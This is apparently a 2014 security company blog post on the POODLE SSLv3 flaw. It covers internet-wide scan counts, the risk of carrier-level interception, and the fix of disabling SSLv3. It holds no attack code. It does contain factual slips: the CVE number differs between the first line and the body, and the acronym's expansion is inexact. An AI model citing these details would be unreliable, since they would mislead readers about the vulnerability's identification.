(October 27, 2014) – The instant the POODLE vulnerability within SSLv3 [CVE-2014-3536] was identified, SecurityScorecard R&D team moved to determine how much of the public Internet was affected by this potentially severe security exposure. In addition, to separate fact from fiction, we sought to determine how exploitable POODLE was, and assign a true risk rating to it.
Fig 1.1 – Global Map of Servers vulnerable to POODLE
What is POODLE?
POODLE stands for Padded Oracle On Downgrade Legacy Attack [CVE-2014-3566]. It was first identified by researchers at Google. Those researchers compared the POODLE exploitation scenario to that of the BEAST SSL/TLS attack scenario of 2011, with variations on the mathematical decryption methodologies against the target encryption schema.
As of this blog posting, POODLE is thought by several security pundits to only impact Local Area Networks [LANs], decrypting traffic during a local Man in the Middle [MITM] attack. Further, they believe vulnerability is likely to impact small scale networks only. However, SecurityScorecard research found the problem may be more widespread than initially thought. Figure 1.1, PoodleMap.com, indicates more than 1,012,172 servers were detected as vulnerable, including those on military systems, government systems and large financial enterprise networks.
PoodleMap.com is a public website that shows the geographic distribution of POODLE vulnerable servers. We urge you to search your own IP addresses to see if your network is affected.
How risky is POODLE?
SecurityScorecard research confirmed the PoodleMap.com findings. We identified in excess of 1 million public IP addresses were vulnerable to a POODLE SSL attack. More important, we found a greater risk lies within the potential that a Man-in-the-Middle [MITM] attack can be carried out at the ISP/carrier level. If an interception were to take place at at that level, decryption of large segments SSLv3 traffic would be possible.
.Although difficult for a novice hacker, an organized group of experienced cybercriminals could successfully carry out a carrier interception, as could rogue government units, and intelligence agencies the world over. SecurityScorecard believes this could lead to widespread data theft, loss of national secrets and loss of corporate intellectual property.
How can I defend my servers against POODLE?
A simple way to defend against the POODLE attack is to disable the use of SSLv3 and upgrade your instances of OpenSSL.
References
Google whitepaper – https://www.openssl.org/~bodo/…
Glossary
Carrier – Telecommunications company
POODLE – Padded Oracle On Downgrade Lecgacy Attack used to attack SSLv3
SSL – Secure Socket Layer used for encrypting communications
TLS – Transport Layer Security was developed as followup to SSL
MITM – Man In The MIddle attack whereby a malicious actor intercepts traffic
ISP – Internet Service Provider